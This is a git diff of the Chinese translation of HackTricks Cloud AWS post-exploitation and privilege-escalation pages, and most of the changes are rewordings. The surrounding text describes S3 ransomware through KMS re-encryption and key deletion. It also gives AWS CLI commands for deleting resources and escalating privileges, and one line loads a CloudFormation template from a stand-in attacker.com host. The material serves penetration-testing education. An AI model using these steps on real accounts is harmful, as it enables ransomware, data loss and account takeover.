-为了确定存储桶是否可以被用作勒索软件的目标,攻击者检查其配置。这包括验证是否启用了 **S3 对象版本控制** 和 **多因素身份验证删除(MFA 删除)是否启用**。如果未启用对象版本控制,攻击者可以继续。如果启用了对象版本控制但未启用 MFA 删除,攻击者可以 **禁用对象版本控制**。如果同时启用了对象版本控制和 MFA 删除,攻击者就更难对该特定存储桶进行勒索软件攻击。
+为了确定桶是否可以被用作勒索软件的目标,攻击者检查其配置。这包括验证是否启用了 **S3 对象版本控制** 和 **多因素身份验证删除(MFA 删除)是否启用**。如果未启用对象版本控制,攻击者可以继续。如果启用了对象版本控制但 MFA 删除被禁用,攻击者可以 **禁用对象版本控制**。如果同时启用了对象版本控制和 MFA 删除,攻击者对该特定桶进行勒索软件攻击将变得更加困难。
-使用 AWS API,攻击者 **用他们的 KMS 密钥替换存储桶中的每个对象为加密副本**。这有效地加密了存储桶中的数据,使其在没有密钥的情况下无法访问。
+使用 AWS API,攻击者 **用他们的 KMS 密钥替换桶中的每个对象为加密副本**。这有效地加密了桶中的数据,使其在没有密钥的情况下无法访问。
-为了施加更大的压力,攻击者安排删除在攻击中使用的 KMS 密钥。这给目标提供了 7 天的时间窗口,以在密钥被删除之前恢复他们的数据,之后数据将永久丢失。
+为了施加进一步的压力,攻击者安排删除用于攻击的 KMS 密钥。这给目标提供了 7 天的时间窗口来恢复他们的数据,然后密钥将被删除,数据将永久丢失。
-最后,攻击者可以上传一个最终文件,通常命名为 "ransom-note.txt",其中包含目标如何检索其文件的说明。该文件未加密上传,可能是为了引起目标的注意并让他们意识到勒索软件攻击。
+最后,攻击者可以上传一个最终文件,通常命名为 "ransom-note.txt",其中包含目标如何检索其文件的说明。该文件未加密上传,可能是为了引起目标的注意并使他们意识到勒索软件攻击。
**有关更多信息** [**请查看原始研究**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**。**
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
index c89233c99..77d90a168 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
@@ -32,9 +32,9 @@ aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
```
-### DoS 删除秘密
+### DoS 删除密钥
-删除秘密的最少天数为 7
+删除密钥的最少天数为 7 天
```bash
aws secretsmanager delete-secret \
--secret-id MyTestSecret \
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
index ddbae9a7f..6c4501b44 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
@@ -59,7 +59,7 @@ aws ses send-bounce --original-message-id --bounce-sender --boun
### `ses:SendCustomVerificationEmail`
-这将发送一封自定义验证电子邮件。您可能还需要权限来创建模板电子邮件。
+这将发送一封定制的验证电子邮件。您可能还需要权限来创建模板电子邮件。
```bash
aws ses send-custom-verification-email --email-address --template-name
aws sesv2 send-custom-verification-email --email-address --template-name
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
index 907f786f3..5c70106de 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
@@ -1,4 +1,4 @@
-# AWS - SNS Post Exploitation
+# AWS - SNS 后期利用
{{#include ../../../banners/hacktricks-training.md}}
@@ -40,7 +40,7 @@ aws sns set-topic-attributes --topic-arn --attribute-name --attr
### `sns:Subscribe` , `sns:Unsubscribe`
-攻击者可以订阅或取消订阅SNS主题,可能会获得对消息的未经授权访问或干扰依赖该主题的应用程序的正常功能。
+攻击者可能会订阅或取消订阅SNS主题,从而可能获得对消息的未经授权访问或干扰依赖该主题的应用程序的正常功能。
```bash
aws sns subscribe --topic-arn --protocol --endpoint
aws sns unsubscribe --subscription-arn
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
index f0ff235b8..d1eb80409 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
@@ -17,7 +17,7 @@
aws sqs send-message --queue-url --message-body
aws sqs send-message-batch --queue-url --entries
```
-**潜在影响**:漏洞利用,数据损坏,意外操作或资源耗尽。
+**潜在影响**:漏洞利用、数据损坏、意外操作或资源耗尽。
### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
@@ -35,11 +35,11 @@ aws sqs change-message-visibility --queue-url --receipt-handle -
```arduino
Copy codeaws sqs delete-queue --queue-url
```
-**潜在影响**:使用已删除队列的应用程序可能会出现消息丢失和服务中断。
+**潜在影响**:使用已删除队列的应用程序可能会丢失消息和服务中断。
### `sqs:PurgeQueue`
-攻击者可以清除 SQS 队列中的所有消息,从而导致消息丢失和依赖这些消息的应用程序可能出现中断。
+攻击者可以清除 SQS 队列中的所有消息,从而导致消息丢失和依赖这些消息的应用程序可能中断。
```arduino
Copy codeaws sqs purge-queue --queue-url
```
@@ -47,7 +47,7 @@ Copy codeaws sqs purge-queue --queue-url
### `sqs:SetQueueAttributes`
-攻击者可以修改SQS队列的属性,可能会影响其性能、安全性或可用性。
+攻击者可能会修改 SQS 队列的属性,从而可能影响其性能、安全性或可用性。
```arduino
aws sqs set-queue-attributes --queue-url --attributes
```
@@ -55,7 +55,7 @@ aws sqs set-queue-attributes --queue-url --attributes
### `sqs:TagQueue` , `sqs:UntagQueue`
-攻击者可以添加、修改或删除SQS资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。
+攻击者可以添加、修改或删除 SQS 资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。
```bash
aws sqs tag-queue --queue-url --tags Key=,Value=
aws sqs untag-queue --queue-url --tag-keys
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
index 1725cdbd1..a8c612bf1 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -1,4 +1,4 @@
-# AWS - Step Functions 后期利用
+# AWS - Step Functions Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
@@ -24,7 +24,7 @@
>
> - 删除状态机时,您还会删除其所有关联的版本和别名。
> - 删除状态机别名时,您不会删除引用此别名的状态机版本。
-> - 当前引用一个或多个别名的状态机版本无法删除。
+> - 当前引用一个或多个别名的状态机版本无法被删除。
```bash
# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn
@@ -37,15 +37,15 @@ aws stepfunctions delete-state-machine-alias --state-machine-alias-arn
### `states:UpdateMapRun`
-拥有此权限的攻击者将能够操纵 Map Run 失败配置和并行设置,能够增加或减少允许的最大子工作流执行数量,直接影响服务的性能。此外,攻击者还可以篡改容忍的失败百分比和计数,能够将此值减少到 0,这样每当一个项目失败时,整个 map run 将失败,直接影响状态机执行,并可能中断关键工作流程。
+拥有此权限的攻击者将能够操纵 Map Run 失败配置和并行设置,能够增加或减少允许的子工作流执行的最大数量,直接影响服务的性能。此外,攻击者可以篡改容忍的失败百分比和计数,能够将此值减少到 0,这样每当一个项目失败时,整个地图运行将失败,直接影响状态机执行,并可能中断关键工作流程。
```bash
aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ]
```
-- **潜在影响**:性能下降,以及关键工作流程的中断。
+- **潜在影响**: 性能下降,以及关键工作流程的中断。
### `states:StopExecution`
-拥有此权限的攻击者可能能够停止任何状态机的执行,从而中断正在进行的工作流程和过程。这可能导致交易不完整、业务操作中断以及潜在的数据损坏。
+拥有此权限的攻击者可能能够停止任何状态机的执行,从而干扰正在进行的工作流程和过程。这可能导致交易不完整、业务操作中断以及潜在的数据损坏。
> [!WARNING]
> 此操作不支持 **express state machines**。
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
index 088234be1..6ab5ea727 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -17,7 +17,7 @@
#### 自定义脚本
-以下脚本将使用默认配置文件和默认 AWS 位置(非政府和非中国)为您提供一个签名 URL,您可以用它登录网络控制台:
+以下脚本将使用默认配置文件和默认 AWS 位置(非政府和非中国)为您提供一个可以用于登录网络控制台的签名 URL:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
@@ -50,7 +50,6 @@ resp=$(curl -s "$federation_endpoint" \
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
-
# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
@@ -80,7 +79,7 @@ aws-vault login jonsmith # Open a browser logged as jonsmith
### **通过 Python 绕过 User-Agent 限制**
-如果存在 **基于用户代理执行某些操作的限制**(例如,基于用户代理限制使用 python boto3 库),可以使用前面的技术 **通过浏览器连接到 web 控制台**,或者您可以直接 **通过以下方式修改 boto3 用户代理**:
+如果存在 **基于用户代理执行某些操作的限制**(例如,基于用户代理限制使用 python boto3 库),可以使用前面提到的技术 **通过浏览器连接到 web 控制台**,或者您可以直接 **通过以下方式修改 boto3 用户代理**:
```bash
# Shared by ex16x41
# Create a client
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
index d1ea4db27..ee970d1f5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -4,13 +4,13 @@
## AWS 权限提升
-在 AWS 中提升权限的方法是拥有足够的权限,以便能够以某种方式访问其他角色/用户/组的权限。通过链式提升,直到您获得组织的管理员访问权限。
+在 AWS 中提升权限的方法是拥有足够的权限,以便能够以某种方式访问其他角色/用户/组的权限。通过链式提升,直到您获得对组织的管理员访问权限。
> [!WARNING]
-> AWS 有 **数百**(如果不是数千)个 **权限** 可以授予实体。在本书中,您可以找到 **我知道的所有权限**,您可以利用这些权限来 **提升权限**,但如果您 **知道一些未提及的路径**,**请分享**。
+> AWS 有 **数百**(如果不是数千)个 **权限** 可以授予实体。在本书中,您可以找到 **我所知道的所有权限**,您可以利用这些权限来 **提升权限**,但如果您 **知道一些未提及的路径**,**请分享**。
> [!CAUTION]
-> 如果 IAM 策略具有 `"Effect": "Allow"` 和 `"NotAction": "Someaction"` 指示一个 **资源**... 这意味着 **被允许的主体** 有 **权限执行除指定操作以外的任何操作**。\
+> 如果 IAM 策略具有 `"Effect": "Allow"` 和 `"NotAction": "Someaction"` 指示 **资源**... 这意味着 **允许的主体** 有 **权限执行除指定操作以外的任何操作**。\
> 所以请记住,这是一种 **授予主体特权权限** 的另一种方式。
**本节的页面按 AWS 服务排序。在这里,您将能够找到允许您提升权限的权限。**
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
index 99be2c6ac..c9897e1bc 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -16,7 +16,7 @@
```bash
aws --region apigateway create-api-key
```
-**潜在影响:** 你无法通过此技术进行权限提升,但你可能会获得敏感信息的访问权限。
+**潜在影响:** 你无法通过这种技术进行权限提升,但你可能会获得敏感信息的访问权限。
### `apigateway:GET`
@@ -29,7 +29,7 @@ aws --region apigateway get-api-key --api-key --include-value
### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`
-拥有这些权限后,可以修改API的资源策略,以便为自己提供调用它的权限,并滥用API网关可能具有的潜在访问权限(例如调用一个脆弱的lambda)。
+拥有这些权限后,可以修改 API 的资源策略,以便让自己获得调用它的权限,并滥用 API 网关可能具有的潜在访问权限(例如调用一个易受攻击的 lambda)。
```bash
aws apigateway update-rest-api \
--rest-api-id api-id \
@@ -56,14 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-**潜在影响**:访问与Lambda函数的IAM角色相关的资源。
+**潜在影响**:访问与 Lambda 函数的 IAM 角色相关的资源。
### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`
> [!NOTE]
> 需要测试
-拥有权限`apigateway:UpdateAuthorizer`和`apigateway:CreateDeployment`的攻击者可以**修改现有的API Gateway授权者**以绕过安全检查或在API请求时执行任意代码。
+拥有 `apigateway:UpdateAuthorizer` 和 `apigateway:CreateDeployment` 权限的攻击者可以**修改现有的 API Gateway 授权者**,以绕过安全检查或在进行 API 请求时执行任意代码。
```bash
API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
index e11e41cea..56ffcc06b 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -12,7 +12,7 @@
### `iam:PassRole`, `cloudformation:CreateStack`
-具有这些权限的攻击者 **可以提升权限**,通过制作一个 **CloudFormation 堆栈**,使用托管在其服务器上的自定义模板,**在指定角色的权限下执行操作:**
+具有这些权限的攻击者**可以提升权限**,通过制作一个**CloudFormation 堆栈**,使用托管在其服务器上的自定义模板,**以指定角色的权限执行操作:**
```bash
aws cloudformation create-stack --stack-name \
--template-url http://attacker.com/attackers.template \
@@ -43,7 +43,7 @@ aws cloudformation update-stack \
### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`
-如果你拥有这个权限但 **没有 `iam:PassRole`**,你仍然可以 **更新已使用的堆栈** 并滥用 **它们已经附加的 IAM 角色**。请查看前面的部分以获取利用示例(只需在更新中不指明任何角色)。
+如果你拥有这个权限但 **没有 `iam:PassRole`**,你仍然可以 **更新已使用的堆栈** 并滥用 **它们已经附加的 IAM 角色**。查看前面的部分以获取利用示例(只需在更新中不指明任何角色)。
`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `UpdateStack` 权限** 以便对一个堆栈进行攻击。
@@ -79,7 +79,7 @@ aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1
```
-`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `ChangeSet` 权限** 以便对一个堆栈执行攻击。
+`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `ChangeSet` 权限** 以便对堆栈执行攻击。
**潜在影响:** 提升到 cloudformation 服务角色的权限。
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
index b154ab0d5..c8041842b 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -55,7 +55,7 @@
}
}
```
-然后**生成云形成堆栈**:
+然后**生成 CloudFormation 堆栈**:
```bash
aws cloudformation create-stack --stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
@@ -68,7 +68,7 @@ aws cloudformation describe-stacks \
--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
--region uswest-2
```
-### 参考文献
+### 参考
- [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index ae33bb59c..21b012081 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -12,7 +12,7 @@
### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
-仅凭其中一个权限就足以触发一个新的 buildspec 的构建,并窃取分配给该项目的 iam 角色的令牌:
+仅凭其中一个权限就足以触发一个新的 buildspec 的构建,并窃取分配给项目的 iam 角色的令牌:
{{#tabs }}
{{#tab name="StartBuild" }}
@@ -67,7 +67,7 @@ aws codebuild start-build-batch --project --buildspec-override fi
### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
-拥有 **`iam:PassRole`, `codebuild:CreateProject` 和 `codebuild:StartBuild` 或 `codebuild:StartBuildBatch`** 权限的攻击者将能够 **通过创建一个正在运行的构建来提升到任何 codebuild IAM 角色**。
+拥有 **`iam:PassRole`, `codebuild:CreateProject` 和 `codebuild:StartBuild` 或 `codebuild:StartBuildBatch`** 权限的攻击者将能够通过创建一个正在运行的构建来 **提升到任何 codebuild IAM 角色**。
{{#tabs }}
{{#tab name="Example1" }}
@@ -114,7 +114,7 @@ aws codebuild delete-project --name codebuild-demo-project
```
{{#endtab }}
-{{#tab name="示例2" }}
+{{#tab name="Example2" }}
```bash
# Generated by AI, not tested
# Create a buildspec.yml file with reverse shell command
@@ -148,9 +148,9 @@ aws codebuild start-build --project-name reverse-shell-project
> 此外,它还包含 **环境变量 `ECS_CONTAINER_METADATA_URI`**,其中包含获取 **容器元数据** 的完整 URL。
-### `iam:PassRole`,`codebuild:UpdateProject`,(`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
-就像在前一节中一样,如果您可以修改而不是创建构建项目,您可以指示 IAM 角色并窃取令牌。
+就像在上一节中一样,如果您可以修改而不是创建构建项目,您可以指示 IAM 角色并窃取令牌。
```bash
REV_PATH="/tmp/codebuild_pwn.json"
@@ -188,7 +188,7 @@ aws codebuild start-build --project-name codebuild-demo-project
### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
-与前一节相似,但**没有 `iam:PassRole` 权限**,您可以利用这些权限**修改现有的 Codebuild 项目并访问它们已经分配的角色**。
+与前一部分类似,但**没有 `iam:PassRole` 权限**,您可以利用这些权限**修改现有的 Codebuild 项目并访问它们已经分配的角色**。
{{#tabs }}
{{#tab name="StartBuild" }}
@@ -264,11 +264,11 @@ aws codebuild start-build-batch --project-name codebuild-demo-project
{{#endtab }}
{{#endtabs }}
-**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。
+**潜在影响:** 直接提升附加的 AWS Codebuild 角色的权限。
### SSM
-拥有 **足够的权限来启动 ssm 会话**,可以进入 **正在构建的 Codebuild 项目**。
+拥有 **足够的权限来启动 ssm 会话**,可以进入正在构建的 **Codebuild 项目**。
Codebuild 项目需要有一个断点:
@@ -285,13 +285,13 @@ commands:
aws codebuild batch-get-builds --ids --region --output json
aws ssm start-session --target --region
```
-For more info [**查看文档**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
+有关更多信息 [**查看文档**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html)。
### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
能够启动/重启特定 CodeBuild 项目的构建的攻击者,如果该项目的 `buildspec.yml` 文件存储在攻击者具有写入权限的 S3 存储桶中,则可以在 CodeBuild 过程中获得命令执行。
-注意:只有当 CodeBuild 工作人员的角色与攻击者的角色不同时,升级才是相关的,理想情况下,工作人员的角色具有更高的权限。
+注意:只有当 CodeBuild 工作人员的角色与攻击者的角色不同时,这种提升才相关,理想情况下,工作角色的权限更高。
```bash
aws s3 cp s3:///buildspec.yml ./
@@ -320,9 +320,9 @@ commands:
**影响:** 直接提升到 AWS CodeBuild 工作人员使用的角色,该角色通常具有高权限。
> [!WARNING]
-> 请注意,buildspec 可能以 zip 格式预期,因此攻击者需要下载、解压、修改根目录中的 `buildspec.yml`,然后重新压缩并上传。
+> 请注意,buildspec 可能以 zip 格式提供,因此攻击者需要下载、解压、修改根目录中的 `buildspec.yml`,然后重新压缩并上传。
-更多详细信息可以在 [这里](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) 找到。
+更多细节可以在 [这里](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) 找到。
**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
index c8c2c123c..36afdea46 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -12,13 +12,13 @@
### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
-在创建代码管道时,您可以指示一个 **codepipeline IAM 角色来运行**,因此您可以妥协它们。
+在创建代码管道时,您可以指示一个 **codepipeline IAM 角色来运行**,因此您可能会妥协它们。
除了之前的权限,您还需要 **访问存储代码的位置**(S3、ECR、github、bitbucket...)
-我通过在网页上进行该过程进行了测试,之前提到的权限不是创建代码管道所需的 List/Get 权限,但要在网页上创建它,您还需要:`codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:`
+我通过在网页上进行该过程进行了测试,之前提到的权限不是创建代码管道所需的 List/Get 权限,但在网页上创建它时,您还需要:`codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:`
-在 **创建构建项目** 时,您可以指示一个 **要运行的命令**(rev shell?)并以 **特权用户** 运行构建阶段,这就是攻击者需要妥协的配置:
+在 **创建构建项目** 时,您可以指示一个 **要运行的命令**(rev shell?)并将构建阶段作为 **特权用户** 运行,这就是攻击者需要妥协的配置:
.png>)
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
index f461741ea..e703d78ba 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
@@ -60,7 +60,7 @@ codestar-createproject-codestar-associateteammember.md
- `awscodestar--lambda`
- 确切名称取决于所选模板(参考示例利用脚本)。
3. **访问和权限:**
-- 更新后,您获得与堆栈关联的**CloudFormation IAM角色**分配的能力。
+- 更新后,您将获得与堆栈关联的**CloudFormation IAM角色**分配的能力。
- 注意:这并不固有地提供完全的管理员权限。可能需要环境中其他配置错误的资源来进一步提升权限。
有关更多信息,请查看原始研究:[https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/)。\
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
index b418f1d8c..05080cef3 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
@@ -4,7 +4,7 @@
通过这些权限,您可以**滥用 codestar IAM 角色**来通过**cloudformation 模板**执行**任意操作**。
-要利用这一点,您需要创建一个**可以从被攻击账户访问的 S3 存储桶**。上传一个名为 `toolchain.json` 的文件。该文件应包含**cloudformation 模板漏洞**。以下内容可用于将托管策略设置为您控制的用户,并**授予其管理员权限**:
+要利用这一点,您需要创建一个**可从被攻击账户访问的 S3 存储桶**。上传一个名为 `toolchain.json` 的文件。该文件应包含**cloudformation 模板漏洞**。以下内容可用于将托管策略设置为您控制的用户,并**授予其管理员权限**:
```json:toolchain.json
{
"Resources": {
@@ -28,13 +28,13 @@
}
}
```
-也**上传**这个 `empty zip` 文件到 **bucket**:
+还要将这个 `empty zip` 文件上传到 **bucket**:
{% file src="../../../../images/empty.zip" %}
请记住,**包含这两个文件的 bucket 必须可以被受害者账户访问**。
-上传完这两样东西后,您现在可以继续进行 **exploitation** 创建一个 **codestar** 项目:
+上传完这两样东西后,您现在可以继续进行 **exploitation**,创建一个 **codestar** 项目:
```bash
PROJECT_NAME="supercodestar"
@@ -79,6 +79,6 @@ aws codestar create-project \
--source-code file://$SOURCE_CODE_PATH \
--toolchain file://$TOOLCHAIN_PATH
```
-此漏洞基于**这些权限的Pacu漏洞**:[https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) 在这里你可以找到为角色创建管理员管理策略的变体,而不是为用户创建。
+此漏洞基于**这些权限的Pacu漏洞**:[https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) 在其中,您可以找到为角色创建管理员管理策略的变体,而不是为用户创建。
{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
index ba2977e3e..46245f546 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
@@ -16,7 +16,7 @@
有关更多信息,请[**查看此页面**](../aws-unauthenticated-enum-access/#cognito)。
-**潜在影响:** 直接权限提升到附加给未认证用户的服务角色(可能也包括附加给已认证用户的角色)。
+**潜在影响:** 直接提升到附加到未认证用户的服务角色(可能还包括附加到已认证用户的角色)。
### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole`
@@ -32,13 +32,13 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
```
-如果 Cognito 应用 **没有启用未认证用户**,您可能还需要权限 `cognito-identity:UpdateIdentityPool` 来启用它。
+如果cognito应用**没有启用未认证用户**,您可能还需要权限`cognito-identity:UpdateIdentityPool`来启用它。
-**潜在影响:** 直接的权限提升到任何 Cognito 角色。
+**潜在影响:** 直接提升到任何cognito角色。
### `cognito-identity:update-identity-pool`
-拥有此权限的攻击者可以设置例如一个在他控制下的 Cognito 用户池或任何其他身份提供者,在那里他可以登录 **以访问此 Cognito 身份池**。然后,只需在该用户提供者上 **登录** 就会 **允许他访问身份池中配置的认证角色**。
+拥有此权限的攻击者可以设置例如一个在其控制下的Cognito用户池或任何其他身份提供者,在那里他可以登录**以访问此Cognito身份池**。然后,只需在该用户提供者上**登录**将**允许他访问身份池中配置的认证角色**。
```bash
# This example is using a Cognito User Pool as identity provider
## but you could use any other identity provider
@@ -61,7 +61,7 @@ aws cognito-identity get-credentials-for-identity \
--identity-id \
--logins cognito-idp..amazonaws.com/=
```
-这也可以**滥用此权限以允许基本身份验证**:
+也可以**滥用此权限以允许基本身份验证**:
```bash
